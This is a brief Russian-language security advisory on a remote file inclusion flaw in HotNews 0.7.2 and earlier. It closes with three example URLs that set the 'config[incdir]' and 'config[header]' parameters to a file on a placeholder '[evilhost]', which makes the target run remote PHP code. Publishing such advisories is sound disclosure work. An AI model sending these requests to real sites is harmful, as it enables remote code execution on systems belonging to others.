Программа: HotNews 0.7.2 и более ранние версии
Уязвимость включения файлов обнаружена в HotNews. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.
Уязвимость обнаружена в 'config["header"]' переменной в 'hotnews-engine.inc.php3' файле и в 'config["incdir"]' переменной в 'hnmain.inc.php3' файле. В результате удаленный пользователь может включить произвольный удаленный файл, который будет включен и выполнен на целевой системе с привилегиями Web сервера.
Пример:
http://[victim]/includes/hnmain.inc.php3? config[incdir]=http://[evilhost]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3? config[incdir]=http://[evilhost]/hndefs.inc.php3
http://[victim]/includes/hotnews-engine.inc.php3? config[header]=http://[evil
host]/[evil file]
